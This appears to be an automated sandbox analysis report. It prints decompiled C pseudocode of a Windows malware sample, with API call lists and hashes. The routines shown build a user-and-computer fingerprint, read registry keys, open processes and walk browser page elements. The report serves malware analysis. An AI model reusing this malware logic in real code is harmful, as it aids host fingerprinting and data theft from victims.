                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: AddressProc$AllocateHandleHeapModulememset
                  • String ID:
                  • API String ID: 1886625739-0
                  • Opcode ID: f0a75b5c7bbb7c9d6ed805dd573e68d83d9d87ccec0b6980ab67b05d402d4254
                  • Instruction ID: ea33aea615a47a0de242151d791c7c87a1f5bb4ed29dcc368384ce1455e34e97
                  • Opcode Fuzzy Hash: f0a75b5c7bbb7c9d6ed805dd573e68d83d9d87ccec0b6980ab67b05d402d4254
                  • Instruction Fuzzy Hash: 6E21DDB160164BAFDB10EF69CD84DAABBECEF0434470545A5E619CB221EFB4E905CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00BB94E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                  				signed int _v8;
                  				char _v12;
                  				signed int* _v16;
                  				char _v284;
                  				void* __esi;
                  				char* _t60;
                  				intOrPtr* _t61;
                  				intOrPtr _t65;
                  				char _t68;
                  				intOrPtr _t71;
                  				intOrPtr _t72;
                  				intOrPtr _t74;
                  				signed int _t85;
                  				void* _t95;
                  				void* _t96;
                  				char _t102;
                  				signed int* _t104;
                  				intOrPtr* _t105;
                  				void* _t106;
                  
                  				_t96 = __ecx;
                  				_v8 = _v8 & 0x00000000;
                  				_t102 = _a16;
                  				if(_t102 == 0) {
                  					__imp__( &_v284,  *0xbbd33c);
                  					_t95 = 0x80000002;
                  					L6:
                  					_t60 = E00BB8ECC(0,  &_v284);
                  					_a8 = _t60;
                  					if(_t60 == 0) {
                  						_v8 = 8;
                  						L29:
                  						_t61 = _a20;
                  						if(_t61 != 0) {
                  							 *_t61 =  *_t61 + 1;
                  						}
                  						return _v8;
                  					}
                  					_t105 = _a24;
                  					if(E00BB53BB(_t96, _t101, _t105, _t95, _t60) != 0) {
                  						L27:
                  						E00BB5DE8(_a8);
                  						goto L29;
                  					}
                  					_t65 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t16 = _t65 + 0xbbe8fe; // 0x65696c43
                  					_t68 = E00BB8ECC(0, _t16);
                  					_a24 = _t68;
                  					if(_t68 == 0) {
                  						L14:
                  						_t29 = _t105 + 0x14; // 0x102
                  						_t69 =  *_t29;
                  						_t33 = _t105 + 0x10; // 0x3d00bbc0
                  						if(E00BB5C3B(_t101,  *_t33, _t95, _a8,  *0xbbd334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)(_t69 + 0x2c))) == 0) {
                  							_t71 =  *0xbbd2a4; // 0x2a5a5a8
                  							if(_t102 == 0) {
                  								_t35 = _t71 + 0xbbea5f; // 0x4d4c4b48
                  								_t72 = _t35;
                  							} else {
                  								_t34 = _t71 + 0xbbe89f; // 0x55434b48
                  								_t72 = _t34;
                  							}
                  							if(E00BB4B3D(_t72,  *0xbbd334,  *0xbbd338,  &_a24,  &_a16) == 0) {
                  								if(_t102 == 0) {
                  									_t74 =  *0xbbd2a4; // 0x2a5a5a8
                  									_t44 = _t74 + 0xbbe871; // 0x74666f53
                  									_t103 = E00BB8ECC(0, _t44);
                  									if(_t77 == 0) {
                  										_v8 = 8;
                  									} else {
                  										_t47 = _t105 + 0x10; // 0x3d00bbc0
                  										E00BB9D43( *_t47, _t95, _a8,  *0xbbd338, _a24);
                  										_t49 = _t105 + 0x10; // 0x3d00bbc0
                  										E00BB9D43( *_t49, _t95, _t103,  *0xbbd330, _a16);
                  										E00BB5DE8(_t103);
                  									}
                  								} else {
                  									_t40 = _t105 + 0x10; // 0x3d00bbc0
                  									E00BB9D43( *_t40, _t95, _a8,  *0xbbd338, _a24);
                  									_t43 = _t105 + 0x10; // 0x3d00bbc0
                  									E00BB9D43( *_t43, _t95, _a8,  *0xbbd330, _a16);
                  								}
                  								if( *_t105 != 0) {
                  									E00BB5DE8(_a24);
                  								} else {
                  									 *_t105 = _a16;
                  								}
                  							}
                  						}
                  						goto L27;
                  					}
                  					_t21 = _t105 + 0x10; // 0x3d00bbc0
                  					_t85 = E00BB386E( *_t21, _t95, _a8, _t68,  &_v16,  &_v12);
                  					if(_t85 == 0) {
                  						_t104 = _v16;
                  						if(_v12 == 0x28) {
                  							 *_t104 =  *_t104 & _t85;
                  							_t26 = _t105 + 0x10; // 0x3d00bbc0
                  							E00BB5C3B(_t101,  *_t26, _t95, _a8, _a24, _t104, 0x28);
                  						}
                  						E00BB5DE8(_t104);
                  						_t102 = _a16;
                  					}
                  					E00BB5DE8(_a24);
                  					goto L14;
                  				}
                  				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                  					goto L29;
                  				} else {
                  					_t101 = _a8;
                  					E00BBA899(_t102, _a8,  &_v284);
                  					__imp__(_t106 + _t102 - 0x117,  *0xbbd33c);
                  					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                  					_t95 = 0x80000003;
                  					goto L6;
                  				}
                  			}

                  APIs
                  • StrChrA.SHLWAPI(00BBA82A,0000005F,00000000,00000000,00000104), ref: 00BB9518
                  • lstrcpy.KERNEL32(?,?), ref: 00BB9545
                    • Part of subcall function 00BB8ECC: lstrlen.KERNEL32(?,00000000,00BBD330,00000001,00BB577D,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C), ref: 00BB8ED5
                    • Part of subcall function 00BB8ECC: mbstowcs.NTDLL ref: 00BB8EFC
                    • Part of subcall function 00BB8ECC: memset.NTDLL ref: 00BB8F0E
                    • Part of subcall function 00BB9D43: lstrlenW.KERNEL32(?,?,?,00BB96B8,3D00BBC0,80000002,00BBA82A,00BB23DB,74666F53,4D4C4B48,00BB23DB,?,3D00BBC0,80000002,00BBA82A,?), ref: 00BB9D68
                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  • lstrcpy.KERNEL32(?,00000000), ref: 00BB9567
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                  • String ID: ($\
                  • API String ID: 3924217599-1512714803
                  • Opcode ID: 59998c6e29e5189f6643aa7931ee48d8aca971766bdb74e01076b56156b3d603
                  • Instruction ID: b63510ba73e21be26e97ea09ad4148fec8de1febd45795e4ef421d280b439431
                  • Opcode Fuzzy Hash: 59998c6e29e5189f6643aa7931ee48d8aca971766bdb74e01076b56156b3d603
                  • Instruction Fuzzy Hash: 44515B7150060AAFDF22AF64DD80EFA3BF9EF04310F1046A5FA1697121EBB5DA15DB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BBA0B7() {
                  				long _v8;
                  				long _v12;
                  				int _v16;
                  				long _t39;
                  				long _t43;
                  				signed int _t47;
                  				short _t51;
                  				signed int _t52;
                  				int _t56;
                  				int _t57;
                  				char* _t64;
                  				short* _t67;
                  
                  				_v16 = 0;
                  				_v8 = 0;
                  				GetUserNameW(0,  &_v8);
                  				_t39 = _v8;
                  				if(_t39 != 0) {
                  					_v12 = _t39;
                  					_v8 = 0;
                  					GetComputerNameW(0,  &_v8);
                  					_t43 = _v8;
                  					if(_t43 != 0) {
                  						_v12 = _v12 + _t43 + 2;
                  						_t64 = E00BB98E4(_v12 + _t43 + 2 << 2);
                  						if(_t64 != 0) {
                  							_t47 = _v12;
                  							_t67 = _t64 + _t47 * 2;
                  							_v8 = _t47;
                  							if(GetUserNameW(_t67,  &_v8) == 0) {
                  								L7:
                  								E00BB5DE8(_t64);
                  							} else {
                  								_t51 = 0x40;
                  								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                  								_t52 = _v8;
                  								_v12 = _v12 - _t52;
                  								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                  									goto L7;
                  								} else {
                  									_t56 = _v12 + _v8;
                  									_t31 = _t56 + 2; // 0xbb5f3a
                  									_v12 = _t56;
                  									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                  									_v8 = _t57;
                  									if(_t57 == 0) {
                  										goto L7;
                  									} else {
                  										_t64[_t57] = 0;
                  										_v16 = _t64;
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _v16;
                  			}

                  APIs
                  • GetUserNameW.ADVAPI32(00000000,00BB5F38), ref: 00BBA0CB
                  • GetComputerNameW.KERNEL32(00000000,00BB5F38), ref: 00BBA0E7
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • GetUserNameW.ADVAPI32(00000000,00BB5F38), ref: 00BBA121
                  • GetComputerNameW.KERNEL32(00BB5F38,?), ref: 00BBA144
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00BB5F38,00000000,00BB5F3A,00000000,00000000,?,?,00BB5F38), ref: 00BBA167
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                  • String ID:
                  • API String ID: 3850880919-0
                  • Opcode ID: f5acca8e962ddb9fab510b1f1eea5dfe72159b4196c2b7726a5b255a0150c10b
                  • Instruction ID: b273f43a1dde76bf14bbbf71a852ae9a5fddf8586c658a924f11e1d97f1b56f6
                  • Opcode Fuzzy Hash: f5acca8e962ddb9fab510b1f1eea5dfe72159b4196c2b7726a5b255a0150c10b
                  • Instruction Fuzzy Hash: D121E5B6D00208FBCB11DFA8C9849EEBBB8EF49344B5045AAE601E7200DA70AB44DB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _malloc.LIBCMT ref: 6E112838
                    • Part of subcall function 6E108902: __FF_MSGBANNER.LIBCMT ref: 6E108919
                    • Part of subcall function 6E108902: __NMSG_WRITE.LIBCMT ref: 6E108920
                    • Part of subcall function 6E108902: RtlAllocateHeap.NTDLL(6E24E9EC,00000000,00000001), ref: 6E108945
                  • _free.LIBCMT ref: 6E11284B
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: AllocateHeap_free_malloc
                  • String ID:
                  • API String ID: 1020059152-0
                  • Opcode ID: 7b41e353e8db42efcda0d530ab58a16d9a5f9b85386c47308628241094915c8d
                  • Instruction ID: 957b0b36752524cb789c3c819980b3da50b24a406ccddb4a92aae05da15f8f19
                  • Opcode Fuzzy Hash: 7b41e353e8db42efcda0d530ab58a16d9a5f9b85386c47308628241094915c8d
                  • Instruction Fuzzy Hash: 1A11A731508615EFDB65AFF5A844ECA37ECAF16364B204939E9589B184DF3488C1F750
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00BBA2D9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                  				void* __esi;
                  				long _t10;
                  				void* _t18;
                  				void* _t22;
                  
                  				_t9 = __eax;
                  				_t22 = __eax;
                  				if(_a4 != 0 && E00BB6108(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                  					L9:
                  					return GetLastError();
                  				}
                  				_t10 = E00BBA96C(_t9, _t18, _t22, _a8);
                  				if(_t10 == 0) {
                  					ResetEvent( *(_t22 + 0x1c));
                  					ResetEvent( *(_t22 + 0x20));
                  					_push(0);
                  					_push(0);
                  					_push(0xffffffff);
                  					_push(0);
                  					_push( *((intOrPtr*)(_t22 + 0x18)));
                  					if( *0xbbd12c() != 0) {
                  						SetEvent( *(_t22 + 0x1c));
                  						goto L7;
                  					} else {
                  						_t10 = GetLastError();
                  						if(_t10 == 0x3e5) {
                  							L7:
                  							_t10 = 0;
                  						}
                  					}
                  				}
                  				if(_t10 == 0xffffffff) {
                  					goto L9;
                  				}
                  				return _t10;
                  			}

                  APIs
                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00BB15D7,?,?,00000000,00000000), ref: 00BBA313
                  • ResetEvent.KERNEL32(?), ref: 00BBA318
                  • GetLastError.KERNEL32 ref: 00BBA330
                  • GetLastError.KERNEL32(?,?,00000102,00BB15D7,?,?,00000000,00000000), ref: 00BBA34B
                    • Part of subcall function 00BB6108: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?,?,00000000), ref: 00BB6114
                    • Part of subcall function 00BB6108: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?), ref: 00BB6172
                    • Part of subcall function 00BB6108: lstrcpy.KERNEL32(00000000,00000000), ref: 00BB6182
                  • SetEvent.KERNEL32(?), ref: 00BBA33E
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                  • String ID:
                  • API String ID: 1449191863-0
                  • Opcode ID: 4eed7b55996d14f857cae58fba78609509141168065c9db00dcb70a69e8711b2
                  • Instruction ID: 29a5a09429f0deb88a31ec67ba111c7bc55e6cb2ab5604f6ef08ac5d875de9a2
                  • Opcode Fuzzy Hash: 4eed7b55996d14f857cae58fba78609509141168065c9db00dcb70a69e8711b2
                  • Instruction Fuzzy Hash: F3016D31504200ABDB30AF75DC85FABBAE9EF44764F214B65F551A20E0DBB1D804DA66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB12ED(intOrPtr _a4) {
                  				void* _t2;
                  				unsigned int _t4;
                  				void* _t5;
                  				long _t6;
                  				void* _t7;
                  				void* _t15;
                  
                  				_t2 = CreateEventA(0, 1, 0, 0);
                  				 *0xbbd26c = _t2;
                  				if(_t2 == 0) {
                  					return GetLastError();
                  				}
                  				_t4 = GetVersion();
                  				if(_t4 != 5) {
                  					L4:
                  					if(_t15 <= 0) {
                  						_t5 = 0x32;
                  						return _t5;
                  					}
                  					L5:
                  					 *0xbbd25c = _t4;
                  					_t6 = GetCurrentProcessId();
                  					 *0xbbd258 = _t6;
                  					 *0xbbd264 = _a4;
                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                  					 *0xbbd254 = _t7;
                  					if(_t7 == 0) {
                  						 *0xbbd254 =  *0xbbd254 | 0xffffffff;
                  					}
                  					return 0;
                  				}
                  				if(_t4 >> 8 > 0) {
                  					goto L5;
                  				}
                  				_t15 = _t4 - _t4;
                  				goto L4;
                  			}

                  APIs
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00BBA21D,?,?,00000001,?,?,?,00BB5C19,?), ref: 00BB12F5
                  • GetVersion.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BB1304
                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BB1320
                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BB133D
                  • GetLastError.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BB135C
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File
                  Similarity
                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                  • String ID:
                  • API String ID: 2270775618-0
                  • Opcode ID: 43ce8d78ab3b23db43170c067e185564c54a2c8e8d571e4d4f9569c08ba38627
                  • Instruction ID: f42b7e3a85860030b4fc84d7af63ba1d62a4dba7ce1c3106e3793f2ed2a600e7
                  • Opcode Fuzzy Hash: 43ce8d78ab3b23db43170c067e185564c54a2c8e8d571e4d4f9569c08ba38627
                  • Instruction Fuzzy Hash: 76F0A430544342EBDB109B28EC29B693FE1E744705F904B19E542C71E0FEF4C441CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00BB1A6F
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB1B54
                    • Part of subcall function 00BB7B9D: SysAllocString.OLEAUT32(00BBC2B0), ref: 00BB7BED
                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 00BB1BA7
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB1BB6
                    • Part of subcall function 00BB8803: Sleep.KERNEL32(000001F4), ref: 00BB884B
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                  • String ID:
                  • API String ID: 3193056040-0
                  • Opcode ID: cf58b2c830924bd4809e26f619439107a5b4122f311ce54d6b5564c0eb567280
                  • Instruction ID: ce0be505708727c8799c47f28561eaa3a316500ce1a7afcb1d94f351350ebc0e
                  • Opcode Fuzzy Hash: cf58b2c830924bd4809e26f619439107a5b4122f311ce54d6b5564c0eb567280
                  • Instruction Fuzzy Hash: 3E516135900609EFDB11DFA8C854AEEB7F6FF88740B148968E515DB220EBB1DD06CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 46%
                  			E00BB7B9D(intOrPtr* __eax) {
                  				void* _v8;
                  				WCHAR* _v12;
                  				void* _v16;
                  				char _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				void* _v32;
                  				intOrPtr _v40;
                  				short _v48;
                  				intOrPtr _v56;
                  				short _v64;
                  				intOrPtr* _t54;
                  				intOrPtr* _t56;
                  				intOrPtr _t57;
                  				intOrPtr* _t58;
                  				intOrPtr* _t60;
                  				void* _t61;
                  				intOrPtr* _t63;
                  				intOrPtr* _t65;
                  				short _t67;
                  				intOrPtr* _t68;
                  				intOrPtr* _t70;
                  				intOrPtr* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr* _t77;
                  				intOrPtr _t79;
                  				intOrPtr* _t83;
                  				intOrPtr* _t87;
                  				intOrPtr _t103;
                  				intOrPtr _t109;
                  				void* _t118;
                  				void* _t122;
                  				void* _t123;
                  				intOrPtr _t130;
                  
                  				_t123 = _t122 - 0x3c;
                  				_push( &_v8);
                  				_push(__eax);
                  				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                  				if(_t118 >= 0) {
                  					_t54 = _v8;
                  					_t103 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t5 = _t103 + 0xbbe038; // 0x3050f485
                  					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                  					_t56 = _v8;
                  					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                  					if(_t118 >= 0) {
                  						__imp__#2(0xbbc2b0);
                  						_v28 = _t57;
                  						if(_t57 == 0) {
                  							_t118 = 0x8007000e;
                  						} else {
                  							_t60 = _v32;
                  							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                  							_t87 = __imp__#6;
                  							_t118 = _t61;
                  							if(_t118 >= 0) {
                  								_t63 = _v24;
                  								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                  								if(_t118 >= 0) {
                  									_t130 = _v20;
                  									if(_t130 != 0) {
                  										_t67 = 3;
                  										_v64 = _t67;
                  										_v48 = _t67;
                  										_v56 = 0;
                  										_v40 = 0;
                  										if(_t130 > 0) {
                  											while(1) {
                  												_t68 = _v24;
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t123 = _t123;
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                  												if(_t118 < 0) {
                  													goto L16;
                  												}
                  												_t70 = _v8;
                  												_t109 =  *0xbbd2a4; // 0x2a5a5a8
                  												_t28 = _t109 + 0xbbe0bc; // 0x3050f1ff
                  												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                  												if(_t118 >= 0) {
                  													_t75 = _v16;
                  													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                  													if(_t118 >= 0 && _v12 != 0) {
                  														_t79 =  *0xbbd2a4; // 0x2a5a5a8
                  														_t33 = _t79 + 0xbbe078; // 0x76006f
                  														if(lstrcmpW(_v12, _t33) == 0) {
                  															_t83 = _v16;
                  															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                  														}
                  														 *_t87(_v12);
                  													}
                  													_t77 = _v16;
                  													 *((intOrPtr*)( *_t77 + 8))(_t77);
                  												}
                  												_t72 = _v8;
                  												 *((intOrPtr*)( *_t72 + 8))(_t72);
                  												_v40 = _v40 + 1;
                  												if(_v40 < _v20) {
                  													continue;
                  												}
                  												goto L16;
                  											}
                  										}
                  									}
                  								}
                  								L16:
                  								_t65 = _v24;
                  								 *((intOrPtr*)( *_t65 + 8))(_t65);
                  							}
                  							 *_t87(_v28);
                  						}
                  						_t58 = _v32;
                  						 *((intOrPtr*)( *_t58 + 8))(_t58);
                  					}
                  				}
                  				return _t118;
                  			}


                  APIs
                  • SysAllocString.OLEAUT32(00BBC2B0), ref: 00BB7BED
                  • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00BB7CCE
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB7CE7
                  • SysFreeString.OLEAUT32(?), ref: 00BB7D16
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$Free$Alloclstrcmp
                  • String ID:
                  • API String ID: 1885612795-0
                  • Opcode ID: b7ef8aaf5749ec26f46d443d2a2ec4133e60ef42a8423a0e0b0fe5ed52aca944
                  • Instruction ID: 833ce30eb01b2e15a2025b6336a39b1c4dc59ab91f87e8944d16d3d751d21dca
                  • Opcode Fuzzy Hash: b7ef8aaf5749ec26f46d443d2a2ec4133e60ef42a8423a0e0b0fe5ed52aca944
                  • Instruction Fuzzy Hash: FA513075D0051AEFCB01DFA8C8889EEB7B9FFC9704B144599E915EB210DBB1AD41CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00BB57D8(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				void _v92;
                  				void _v236;
                  				void* _t55;
                  				unsigned int _t56;
                  				signed int _t66;
                  				signed int _t74;
                  				void* _t76;
                  				signed int _t79;
                  				void* _t81;
                  				void* _t92;
                  				void* _t96;
                  				signed int* _t99;
                  				signed int _t101;
                  				signed int _t103;
                  				void* _t107;
                  
                  				_t92 = _a12;
                  				_t101 = __eax;
                  				_t55 = E00BBA190(_a16, _t92);
                  				_t79 = _t55;
                  				if(_t79 == 0) {
                  					L18:
                  					return _t55;
                  				}
                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                  				_t81 = 0;
                  				_t96 = 0x20;
                  				if(_t56 == 0) {
                  					L4:
                  					_t97 = _t96 - _t81;
                  					_v12 = _t96 - _t81;
                  					E00BB13CE(_t79,  &_v236);
                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00BB6269(_t101,  &_v236, _a8, _t96 - _t81);
                  					E00BB6269(_t79,  &_v92, _a12, _t97);
                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                  					_t66 = E00BB13CE(_t101, 0xbbd1b0);
                  					_t103 = _t101 - _t79;
                  					_a8 = _t103;
                  					if(_t103 < 0) {
                  						L17:
                  						E00BB13CE(_a16, _a4);
                  						E00BB56A4(_t79,  &_v236, _a4, _t97);
                  						memset( &_v236, 0, 0x8c);
                  						_t55 = memset( &_v92, 0, 0x44);
                  						goto L18;
                  					}
                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                  					do {
                  						if(_v8 != 0xffffffff) {
                  							_push(1);
                  							_push(0);
                  							_push(0);
                  							_push( *_t99);
                  							L00BBB088();
                  							_t74 = _t66 +  *(_t99 - 4);
                  							asm("adc edx, esi");
                  							_push(0);
                  							_push(_v8 + 1);
                  							_push(_t92);
                  							_push(_t74);
                  							L00BBB082();
                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                  								_t74 = _t74 | 0xffffffff;
                  								_v16 = _v16 & 0x00000000;
                  							}
                  						} else {
                  							_t74 =  *_t99;
                  						}
                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                  						_a12 = _t74;
                  						_t76 = E00BB1116(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                  						while(1) {
                  							 *_t99 =  *_t99 - _t76;
                  							if( *_t99 != 0) {
                  								goto L14;
                  							}
                  							L13:
                  							_t92 =  &_v92;
                  							if(E00BB1469(_t79, _t92, _t106) < 0) {
                  								break;
                  							}
                  							L14:
                  							_a12 = _a12 + 1;
                  							_t76 = E00BBA385(_t79,  &_v92, _t106, _t106);
                  							 *_t99 =  *_t99 - _t76;
                  							if( *_t99 != 0) {
                  								goto L14;
                  							}
                  							goto L13;
                  						}
                  						_a8 = _a8 - 1;
                  						_t66 = _a12;
                  						_t99 = _t99 - 4;
                  						 *(0xbbd1b0 + _a8 * 4) = _t66;
                  					} while (_a8 >= 0);
                  					_t97 = _v12;
                  					goto L17;
                  				}
                  				while(_t81 < _t96) {
                  					_t81 = _t81 + 1;
                  					_t56 = _t56 >> 1;
                  					if(_t56 != 0) {
                  						continue;
                  					}
                  					goto L4;
                  				}
                  				goto L4;
                  			}

                  APIs
                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00BB5885
                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00BB589B
                  • memset.NTDLL ref: 00BB593B
                  • memset.NTDLL ref: 00BB594B
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: memset$_allmul_aulldiv
                  • String ID:
                  • API String ID: 3041852380-0
                  • Opcode ID: 95bb8d426a8642eaee811c701a65ea2474239bcaed3193c67bf3231c781e7fd8
                  • Instruction ID: 2df1a8b0c0d71dab0a2e07486b04bafba59cf56eabc65eef614b565db34b7c2d
                  • Opcode Fuzzy Hash: 95bb8d426a8642eaee811c701a65ea2474239bcaed3193c67bf3231c781e7fd8
                  • Instruction Fuzzy Hash: 61419631A00219ABDB209FA8CC81BFE77F8EF44710F1089A9F915A7180EBF09D55CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 00BBA97E
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • ResetEvent.KERNEL32(?), ref: 00BBA9F2
                  • GetLastError.KERNEL32 ref: 00BBAA15
                  • GetLastError.KERNEL32 ref: 00BBAAC0
